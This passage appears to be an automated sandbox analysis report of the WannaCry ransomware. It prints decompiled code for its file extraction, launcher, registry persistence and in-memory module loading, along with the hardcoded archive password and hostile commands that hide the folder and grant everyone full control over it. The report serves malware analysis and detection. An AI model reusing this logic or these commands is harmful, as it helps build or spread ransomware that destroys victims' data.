						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}





































                    0x00407136
                    0x00407136
                    0x00407140
                    0x00407148
                    0x0040714a
                    0x00407168
                    0x0040716b
                    0x0040716e
                    0x00407170
                    0x004071b7
                    0x004071c8
                    0x004071cd
                    0x004071cf
                    0x004071d3
                    0x004071d8
                    0x004071d8
                    0x004071d8
                    0x004071dc
                    0x004071dd
                    0x004071e1
                    0x004071ea
                    0x004071ec
                    0x004071fa
                    0x00000000
                    0x00407206
                    0x00000000
                    0x004071e3
                    0x004071e3
                    0x00000000
                    0x004071e3
                    0x004071e1
                    0x00407172
                    0x00407175
                    0x00407179
                    0x0040717e
                    0x0040717e
                    0x0040717f
                    0x00407181
                    0x00407185
                    0x00407188
                    0x0040715e
                    0x00000000
                    0x0040718a
                    0x0040718a
                    0x0040718d
                    0x00407196
                    0x00407196
                    0x00407198
                    0x0040719b
                    0x004071ad
                    0x004071b3
                    0x004071b6
                    0x00000000
                    0x004071b6
                    0x0040719e
                    0x00407195
                    0x00000000
                    0x00407195
                    0x00407190
                    0x00000000
                    0x00407190
                    0x00407188
                    0x0040714f
                    0x00407210
                    0x00407214
                    0x00407218
                    0x0040721d
                    0x0040721d
                    0x0040721e
                    0x00407220
                    0x00407223
                    0x00407227
                    0x0040722a
                    0x00000000
                    0x00407230
                    0x00407230
                    0x00407233
                    0x0040723c
                    0x0040723c
                    0x0040723e
                    0x00407241
                    0x00407255
                    0x0040725a
                    0x00407261
                    0x0040729c
                    0x0040729f
                    0x004072a9
                    0x004072ac
                    0x004072ae
                    0x004072b0
                    0x004072b2
                    0x004072b2
                    0x004072b4
                    0x00000000
                    0x00000000
                    0x004072b6
                    0x004072b8
                    0x004072be
                    0x004072be
                    0x004072c1
                    0x004072c1
                    0x004072c4
                    0x00000000
                    0x004072c4
                    0x004072ba
                    0x004072bc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004072bc
                    0x004072cf
                    0x004072d5
                    0x004072d8
                    0x00407347
                    0x0040734f
                    0x00407356
                    0x0040737b
                    0x0040738f
                    0x0040739e
                    0x004073a3
                    0x00407312
                    0x00407312
                    0x0040732b
                    0x00407331
                    0x00407331
                    0x00407334
                    0x00407337
                    0x004073b3
                    0x004073b8
                    0x004073c0
                    0x004073c6
                    0x004073c9
                    0x004073ce
                    0x004073cf
                    0x004073cf
                    0x004073d5
                    0x004073d5
                    0x004073d5
                    0x004073d9
                    0x004073eb
                    0x004073ed
                    0x004073f0
                    0x004073f3
                    0x00000000
                    0x00000000
                    0x004073f5
                    0x004073f7
                    0x0040742a
                    0x0040742a
                    0x0040745a
                    0x0040745a
                    0x0040745e
                    0x00407463
                    0x00407463
                    0x0040746b
                    0x00000000
                    0x00407473
                    0x004073f9
                    0x00407415
                    0x00407415
                    0x00407419
                    0x00407454
                    0x00000000
                    0x00407454
                    0x0040741b
                    0x0040741d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040741f
                    0x0040740b
                    0x00407411
                    0x00407413
                    0x00407433
                    0x00000000
                    0x00407433
                    0x00000000
                    0x00407413
                    0x00407421
                    0x00000000
                    0x00407421
                    0x00000000
                    0x00407339
                    0x00407358
                    0x0040735f
                    0x00000000
                    0x00000000
                    0x00407361
                    0x00407368
                    0x004072e1
                    0x004072e7
                    0x004072fc
                    0x0040730a
                    0x0040730f
                    0x00000000
                    0x0040730f
                    0x0040736e
                    0x00407375
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407375
                    0x004072da
                    0x004072da
                    0x004072da
                    0x00000000
                    0x004072da
                    0x004072a1
                    0x00000000
                    0x004072a1
                    0x00407263
                    0x00407266
                    0x00000000
                    0x00000000
                    0x0040726c
                    0x0040726f
                    0x00407271
                    0x00407273
                    0x00407283
                    0x00407283
                    0x00407284
                    0x00407290
                    0x00407290
                    0x00000000
                    0x00407296
                    0x00407275
                    0x00407277
                    0x00000000
                    0x00000000
                    0x00407279
                    0x0040727b
                    0x00407288
                    0x00407288
                    0x00407288
                    0x0040728e
                    0x0040728f
                    0x00000000
                    0x0040728f
                    0x0040727d
                    0x00407281
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407281
                    0x00407244
                    0x0040723b
                    0x00000000
                    0x0040723b
                    0x00407236
                    0x00000000
                    0x00407236
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %s%s$%s%s%s$:$\
                    • API String ID: 0-1100577047
                    • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                    • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                    • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106stringfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}









                    0x00402040
                    0x00402054
                    0x0040208e
                    0x004020a3
                    0x004020b1
                    0x004020b3
                    0x004020bb
                    0x004020c3
                    0x004020c8
                    0x004020cf
                    0x004020d0
                    0x004020d5
                    0x004020e1
                    0x004020ed
                    0x004020f5
                    0x004020fa
                    0x004020fc
                    0x00402104
                    0x00402119
                    0x0040212a
                    0x00402134
                    0x0040214b
                    0x00402151
                    0x00402154
                    0x00402158
                    0x00402158
                    0x00402154
                    0x00402134
                    0x00402160
                    0x00402160
                    0x00000000
                    0x00402061
                    0x00402061
                    0x0040206f
                    0x0040207f
                    0x00000000
                    0x00402165
                    0x00402165
                    0x0040216b
                    0x0040216b
                    0x0040207f

                    APIs
                    • __p___argv.MSVCRT(0040F538), ref: 00402040
                    • strcmp.MSVCRT(?), ref: 0040204B
                    • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                    • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                      • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                    • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                    • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                    • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                      • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                      • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                      • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                      • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                    • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                    • API String ID: 1074704982-2844324180
                    • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                    • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                    • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
				_v12 = _v12 & 0x00000000;
				_t72 = "wd";
				do {
					_push( &_v8);
					_push( &_v216);
					if(_v12 != 0) {
						_push(0x80000001);
					} else {
						_push(0x80000002);
					}
					RegCreateKeyW();
					if(_v8 != 0) {
						if(_a4 == 0) {
							_v16 = 0x207;
							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
							asm("sbb esi, esi");
							_t77 =  ~_t44 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v736);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v736);
							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
							asm("sbb esi, esi");
							_t77 =  ~_t55 + 1;
						}
						RegCloseKey(_v8);
						if(_t77 != 0) {
							_t46 = 1;
							return _t46;
						} else {
							goto L10;
						}
					}
					L10:
					_v12 = _v12 + 1;
				} while (_v12 < 2);
				return 0;
			}
















                    0x0040110f
                    0x00401116
                    0x00401118
                    0x0040111c
                    0x00401129
                    0x0040113a
                    0x0040113c
                    0x0040113e
                    0x0040114b
                    0x00401151
                    0x00401157
                    0x0040115c
                    0x00401164
                    0x0040116b
                    0x0040116c
                    0x00401175
                    0x0040116e
                    0x0040116e
                    0x0040116e
                    0x0040117a
                    0x00401183
                    0x0040118c
                    0x004011cf
                    0x004011e4
                    0x004011ee
                    0x004011f0
                    0x004011f1
                    0x004011fa
                    0x004011fa
                    0x0040118e
                    0x0040119a
                    0x004011bd
                    0x004011c7
                    0x004011c9
                    0x004011c9
                    0x00401203
                    0x0040120b
                    0x00401222
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040120b
                    0x0040120d
                    0x0040120d
                    0x00401210
                    0x00000000

                    APIs
                    • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                    • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                    • strlen.MSVCRT(?), ref: 004011A7
                    • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                    • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                    • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                    • String ID: 0@$Software\$WanaCrypt0r
                    • API String ID: 865909632-3421300005
                    • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                    • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                    • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401B5F Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123COMMON
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E00401B5F(intOrPtr _a4) {
				void _v202;
				short _v204;
				void _v722;
				long _v724;
				signed short _v1240;
				void _v1242;
				long _v1244;
				void* _t55;
				signed int _t65;
				void* _t72;
				long _t83;
				void* _t94;
				void* _t98;

				_t83 =  *0x40f874; // 0x0
				_v1244 = _t83;
				memset( &_v1242, 0, 0x81 << 2);
				asm("stosw");
				_v724 = _t83;
				memset( &_v722, 0, 0x81 << 2);
				asm("stosw");
				_push(0x31);
				_v204 = _t83;
				memset( &_v202, 0, 0 << 2);
				asm("stosw");
				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
				GetWindowsDirectoryW( &_v1244, 0x104);
				_v1240 = _v1240 & 0x00000000;
				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
				_t98 = _t94 + 0x30;
				if(GetFileAttributesW( &_v724) == 0xffffffff) {
					L3:
					swprintf( &_v724, L"%s\\Intel",  &_v1244);
					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
						L2:
						_t55 = 1;
						return _t55;
					} else {
						GetTempPathW(0x104,  &_v724);
						if(wcsrchr( &_v724, 0x5c) != 0) {
							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
						}
						_t65 = E00401AF6( &_v724,  &_v204, _a4);
						asm("sbb eax, eax");
						return  ~( ~_t65);
					}
				}
				_t72 = E00401AF6( &_v724,  &_v204, _a4);
				_t98 = _t98 + 0xc;
				if(_t72 == 0) {
					goto L3;
				}
				goto L2;
			}
















                    0x00401b68
                    0x00401b80
                    0x00401b87
                    0x00401b89
                    0x00401b95
                    0x00401b9c
                    0x00401b9e
                    0x00401ba0
                    0x00401bab
                    0x00401bb4
                    0x00401bb6
                    0x00401bca
                    0x00401bdd
                    0x00401be9
                    0x00401c04
                    0x00401c06
                    0x00401c19
                    0x00401c40
                    0x00401c53
                    0x00401c70
                    0x00401c38
                    0x00401c3a
                    0x00000000
                    0x00401c8f
                    0x00401c97
                    0x00401cb2
                    0x00401cbf
                    0x00401cc4
                    0x00401cd6
                    0x00401ce0
                    0x00000000
                    0x00401ce2
                    0x00401c70
                    0x00401c2c
                    0x00401c31
                    0x00401c36
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                    • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                    • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                    • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                    • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                    • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                      • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                      • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                    • String ID: %s\Intel$%s\ProgramData
                    • API String ID: 3806094219-198707228
                    • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                    • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                    • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004021E9 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
				signed int _v8;
				intOrPtr _v40;
				char _v44;
				void* _t82;
				struct HINSTANCE__* _t83;
				intOrPtr* _t84;
				intOrPtr _t89;
				void* _t91;
				void* _t104;
				void _t107;
				intOrPtr _t116;
				intOrPtr _t124;
				signed int _t125;
				signed char _t126;
				intOrPtr _t127;
				signed int _t134;
				intOrPtr* _t145;
				signed int _t146;
				intOrPtr* _t151;
				intOrPtr _t152;
				short* _t153;
				signed int _t155;
				void* _t156;
				intOrPtr _t157;
				void* _t158;
				void* _t159;
				void* _t160;

				_v8 = _v8 & 0x00000000;
				_t3 =  &_a8; // 0x40213f
				if(E00402457( *_t3, 0x40) == 0) {
					L37:
					return 0;
				}
				_t153 = _a4;
				if( *_t153 == 0x5a4d) {
					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
						goto L37;
					}
					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
						goto L2;
					} else {
						_t9 = _t151 + 0x38; // 0x68004021
						_t126 =  *_t9;
						if((_t126 & 0x00000001) != 0) {
							goto L2;
						}
						_t12 = _t151 + 0x14; // 0x4080e415
						_t13 = _t151 + 6; // 0x4080e0
						_t146 =  *_t13 & 0x0000ffff;
						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
						if(_t146 <= 0) {
							L16:
							_t83 = GetModuleHandleA("kernel32.dll");
							if(_t83 == 0) {
								goto L37;
							}
							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
							_t159 = _t158 + 0xc;
							if(_t84 == 0) {
								goto L37;
							}
							 *_t84( &_v44);
							_t86 = _v40;
							_t23 = _t151 + 0x50; // 0xec8b55c3
							_t25 = _t86 - 1; // 0xec8b55c2
							_t27 = _t86 - 1; // -1
							_t134 =  !_t27;
							_t155 =  *_t23 + _t25 & _t134;
							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
								goto L2;
							}
							_t31 = _t151 + 0x34; // 0x85680040
							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
							_t127 = _t89;
							_t160 = _t159 + 0x14;
							if(_t127 != 0) {
								L21:
								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
								_t156 = _t91;
								if(_t156 != 0) {
									 *((intOrPtr*)(_t156 + 4)) = _t127;
									_t38 = _t151 + 0x16; // 0xc3004080
									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
									_t54 = _t151 + 0x54; // 0x8328ec83
									if(E00402457(_a8,  *_t54) == 0) {
										L36:
										E004029CC(_t156);
										goto L37;
									}
									_t57 = _t151 + 0x54; // 0x8328ec83
									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
									_t59 = _t151 + 0x54; // 0x8328ec83
									_a32 = _t104;
									memcpy(_t104, _a4,  *_t59);
									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
									 *_t156 = _t107;
									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
										goto L36;
									}
									_t68 = _t151 + 0x34; // 0x85680040
									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
										_t152 = 1;
										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
									} else {
										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
										_t152 = 1;
									}
									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
										if(_t116 == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = 0;
											L41:
											return _t156;
										}
										if( *(_t156 + 0x14) == 0) {
											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
											goto L41;
										}
										_push(0);
										_push(_t152);
										_push(_t127);
										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
											goto L41;
										}
										SetLastError(0x45a);
									}
									goto L36;
								}
								_a16(_t127, _t91, 0x8000, _a32);
								L23:
								SetLastError(0xe);
								L3:
								goto L37;
							}
							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
							_t160 = _t160 + 0x14;
							if(_t127 == 0) {
								goto L23;
							}
							goto L21;
						}
						_t145 = _t82 + 0xc;
						do {
							_t157 =  *((intOrPtr*)(_t145 + 4));
							_t124 =  *_t145;
							if(_t157 != 0) {
								_t125 = _t124 + _t157;
